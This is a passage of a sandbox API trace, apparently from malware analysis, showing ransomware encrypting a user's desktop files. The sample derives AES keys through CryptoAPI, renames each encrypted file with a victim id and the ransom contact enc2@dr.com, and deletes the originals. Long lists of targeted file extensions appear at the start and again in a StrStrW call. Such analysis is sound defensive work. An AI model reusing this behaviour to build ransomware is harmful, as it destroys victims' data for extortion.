m.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.542] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.542] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.542] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.544] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x523f, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x523f, lpOverlapped=0x0) returned 1
	[0182.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.549] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb880) returned 1
	[0182.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.551] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.551] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.551] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0182.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.552] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x523f, dwBufLen=0x523f | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x5240) returned 1
	[0182.552] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.553] RtlMoveMemory (in: Destination=0xfe23c8, Source=0xfdd180, Length=0x523f | out: Destination=0xfe23c8) 
	[0182.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.553] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe23c8*, pdwDataLen=0x18bc0c*=0x523f, dwBufLen=0x5240 | out: pbData=0xfe23c8*, pdwDataLen=0x18bc0c*=0x5240) returned 1
	[0182.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.554] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0182.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.554] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0182.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.554] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0182.554] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.554] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.555] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.556] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 89
	[0182.556] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.557] WriteFile (in: hFile=0x388, lpBuffer=0xfe23c8*, nNumberOfBytesToWrite=0x5240, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe23c8*, lpNumberOfBytesWritten=0x18c068*=0x5240, lpOverlapped=0x0) returned 1
	[0182.560] CloseHandle (hObject=0x388) returned 1
	[0182.560] CloseHandle (hObject=0x384) returned 1
	[0182.560] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt")) returned 1
	[0182.566] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt")) returned 0
	[0182.566] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb9b6b0, ftCreationTime.dwHighDateTime=0x1d96c46, ftLastAccessTime.dwLowDateTime=0xb5153200, ftLastAccessTime.dwHighDateTime=0x1d96c57, ftLastWriteTime.dwLowDateTime=0xb5153200, ftLastWriteTime.dwHighDateTime=0x1d96c57, nFileSizeHigh=0x0, nFileSizeLow=0x19dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="V6h5TClb-hm.swf", cAlternateFileName="V6H5TC~1.SWF")) returned 1
	[0182.566] lstrcmpW (lpString1="V6h5TClb-hm.swf", lpString2="..") returned 1
	[0182.566] lstrcmpW (lpString1="V6h5TClb-hm.swf", lpString2=".") returned 1
	[0182.567] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.567] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="V6h5TClb-hm.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V6h5TClb-hm.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V6h5TClb-hm.swf"
	[0182.567] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V6h5TClb-hm.swf") returned 45
	[0182.567] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.567] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V6h5TClb-hm.swf", cchLength=0x2d | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf") returned 0x2d
	[0182.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.567] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.567] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf"
	[0182.568] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf") returned 45
	[0182.568] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.568] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0182.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.568] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.569] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.569] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.569] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.571] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x19dd, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x19dd, lpOverlapped=0x0) returned 1
	[0182.573] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.574] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb198) returned 1
	[0182.575] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.576] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.576] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.576] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.576] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.576] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.576] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.576] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x19dd, dwBufLen=0x19dd | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x19e0) returned 1
	[0182.577] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.577] RtlMoveMemory (in: Destination=0xfdeb68, Source=0xfdd180, Length=0x19dd | out: Destination=0xfdeb68) 
	[0182.577] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.577] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdeb68*, pdwDataLen=0x18bc0c*=0x19dd, dwBufLen=0x19e0 | out: pbData=0xfdeb68*, pdwDataLen=0x18bc0c*=0x19e0) returned 1
	[0182.578] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.578] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.578] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.578] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0182.578] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.580] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0182.580] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.580] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.580] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.581] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.582] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 87
	[0182.582] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.582] WriteFile (in: hFile=0x388, lpBuffer=0xfdeb68*, nNumberOfBytesToWrite=0x19e0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdeb68*, lpNumberOfBytesWritten=0x18c068*=0x19e0, lpOverlapped=0x0) returned 1
	[0182.585] CloseHandle (hObject=0x388) returned 1
	[0182.585] CloseHandle (hObject=0x384) returned 1
	[0182.585] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf")) returned 1
	[0182.588] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v6h5tclb-hm.swf")) returned 0
	[0182.588] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a95a40, ftCreationTime.dwHighDateTime=0x1d971e8, ftLastAccessTime.dwLowDateTime=0xbbc55c20, ftLastAccessTime.dwHighDateTime=0x1d97638, ftLastWriteTime.dwLowDateTime=0xbbc55c20, ftLastWriteTime.dwHighDateTime=0x1d97638, nFileSizeHigh=0x0, nFileSizeLow=0x16a5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="WICtQBU5lB69GNF.gif", cAlternateFileName="WICTQB~1.GIF")) returned 1
	[0182.588] lstrcmpW (lpString1="WICtQBU5lB69GNF.gif", lpString2="..") returned 1
	[0182.589] lstrcmpW (lpString1="WICtQBU5lB69GNF.gif", lpString2=".") returned 1
	[0182.589] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.589] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="WICtQBU5lB69GNF.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WICtQBU5lB69GNF.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WICtQBU5lB69GNF.gif"
	[0182.589] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WICtQBU5lB69GNF.gif") returned 49
	[0182.589] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.589] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WICtQBU5lB69GNF.gif", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif") returned 0x31
	[0182.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.589] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.589] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif") returned="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif"
	[0182.589] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif") returned 49
	[0182.590] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.590] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0182.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.590] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.ri